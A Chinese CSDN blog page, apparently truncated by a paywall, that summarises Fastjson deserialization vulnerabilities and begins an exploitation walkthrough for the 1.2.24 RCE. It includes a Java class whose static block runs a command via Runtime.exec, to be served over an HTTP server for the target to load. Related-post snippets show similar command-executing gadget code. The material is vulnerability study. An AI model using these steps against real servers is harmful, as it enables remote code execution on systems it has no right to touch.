Fastjson系列漏洞实战和总结

最新推荐文章于 2024-05-20 23:13:23 发布
最新推荐文章于 2024-05-20 23:13:23 发布
阅读量2.6w 收藏 43
点赞数 7
文章标签: 安全 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41832837/article/details/109038795
版权

前言

Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。

 

目录

Fastjson<1.2.24远程代码执行(CNVD-2017-02833 )

Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238)

Fstjson < 1.2.60 远程拒绝服务漏洞

Fastjson <=1.2.68 全版本远程代码执行漏洞

总结

1、fastjson指纹识别

Fastjson<1.2.24远程代码执行(CNVD-2017-02833 )

漏洞详情

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

漏洞版本

fastjson <=1.2.24

漏洞分析

http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/

漏洞利用

1、访问存在漏洞的页面,得到json格式的数据。

2、创建TouchFile.java文件,内容如下:

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

3、执行编译命令javac TouchFile.java,得到TouchFile.class文件。并将其通过python3 -m http.server命令放到外网环境中,默认监听端口8000。

最低0.47元/天 解锁文章
「已注销」
关注
  • 7
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
fastjson漏洞——举例说明漏洞以及原理分析——一看就会
可乐多点冰的博客
09-01 4875
最近公司一直说fastjson漏洞,比较很严重,要换成其他的json工具。怀着好奇的心情去看了一些文章,现在简单的记录一下。 1、漏洞分析 总体而言是一个叫做autoType的在搞事情。那么autoType是什么呢? 我们写一段简单代码演示一下: public class JSONController { public static void main(String[] args) throws ParseException { Province province = new
Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable
王嘟嘟的博客
03-16 8282
0x00 前言 反序列化总纲 除了Exception之外,还可以用通过AutoCloseable的方式来进行绕过 0x01 环境搭建 demo: public class Test1 implements AutoCloseable{ public Test1(String cmd){ try { Runtime.getRuntime().exec(cmd); } catch (IOException e) { e.p
FastJson1.2.68分析
LTianHang的博客
06-06 587
FastJson1.2.68漏洞分析
fastjson反序列化漏洞原理
最新发布
m0_73649671的博客
05-20 981
fastjson反序列化漏洞原理
网络安全深入学习第七课——热门框架漏洞(RCE— Fastjson反序列化漏洞
p36273的博客
09-18 1665
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)。
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6909
fastjson反序列化漏洞原理及利用
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2182
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
高版本的fastjson-1.2.71解决安全漏洞.rar
04-14
然而,随着广泛使用,Fastjson在早期版本中出现了一些安全漏洞,这些漏洞可能导致远程代码执行(RCE)和其他安全风险。在标题提到的“高版本的fastjson-1.2.71解决安全漏洞”中,我们主要关注的是Fastjson如何通过...
FastjsonScan.jar 用于burp插件,扫描Fastjson漏洞
07-05
burp插件
fastjson爆出重大漏洞,攻击者可使整个业务瘫痪
01-07
2019年9月5日,360CERT监测到2019年9月3日fastjson在commit 995845170527221ca0293cf290e33a7d6cb52bf7上提交了旨在修复当字符串中包含\x转义字符时可能引发OOM的问题的修复。 360CERT 判断该漏洞危害中。影响面较...
fastjson-1.2.83 针对近期阿里fastjson漏洞,升级解决
05-24
Fastjson 1.2.80 及之前版本使用黑白名单用于防御反序列化漏洞,经研究该防御策略在特定条件下可绕过默认 autoType 关闭限制,攻击远程服务器,风险影响较大。建议 Fastjson 用户尽快采取安全措施保障系统安全
SecExample:JAVA 漏洞靶场 (Vulnerability Environment For Java)
07-24
JAVA 漏洞靶场 截图 介绍 Name Star [注入漏洞-SQL注入] :glowing_star::glowing_star::glowing_star: [注入漏洞-命令注入] :glowing_star: [注入漏洞-spel表达式注入] :glowing_star::glowing_star::glowing_star: [XSS漏洞] :glowing_star: [CSRF漏洞] :glowing_star::glowing_star: [SSRF漏洞] :glowing_star::glowing_star: [CORS漏洞] :glowing_star::glowing_star::glowing_star::glowing_star: [反序列化漏洞-Fastjson反序列化] :glowing_star::glowing_star::glowing_star::glowing_star: [验证码相关漏洞] :glowing_star::glowing_star: 安装 git clone https://github.com/tangxiaofeng7/Se
fastjson漏洞环境
01-12
在给定的“fastjson漏洞环境”中,我们关注的是三个特定版本的 Fastjson 反序列化漏洞:1.2.67、1.2.66 和 1.2.62。 **一、Fastjson 反序列化漏洞** 1. **什么是反序列化漏洞?** 反序列化是将已序列化的数据恢复...
JSONFastJson解析
H90P0820的专栏
03-11 1134
一、阿里巴巴FastJson是一个Json处理工具包,包括“序列化”和“反序列化”两部分,它具备如下特征: 速度最快,测试表明,fastjson具有极快的性能,超越任其他的Java Json parser。包括自称最快的JackJson; 功能强大,完全支持Java Bean、集合、Map、日期、Enum,支持范型,支持自省;无依赖,能够直接运行在Java SE 5.0以上版本;支持Andro
阿里fastjson的使用实例
编程人生
07-23 2599
package com.feng.json; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import com.alibaba.fastjson.JSON; public class JsonDemo {     p
fastjson 1.2.24/1.2.47漏洞复现
good good study
01-09 6214
当我们在渗透测试中,抓包的时候发现返回的流量内容存在json格式时,我们就可以想它是不是使用了fastjson
Fastjson反序列化漏洞分析
热门推荐
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
Fastjson-1.2.47远程命令执行漏洞(标明坑位)
晚安這個未知的世界
09-21 1164
前言 最近一直想复现这个漏洞,但是一直没时间,也没怎么在网上找到真的有用的文章,太多水文了,10篇文章有9篇都是一模一样的copy,还有一篇就只copy了一半,另一半就不搞了,真的是有其人的,于是花了一点时间去复现这个洞,毕竟工作上有可能会遇到的,并且也标明了一些坑位,反正按照这篇文章是可以100%机率可以复现成功的 漏洞概述 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的sett
Fastjson高危漏洞!附解决方法(实战)
langshen1314的专栏
06-17 705
Fastjson
fastjson漏洞
07-27
- *1* [Fastjson系列漏洞实战总结](https://blog.csdn.net/qq_41832837/article/details/109038795)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值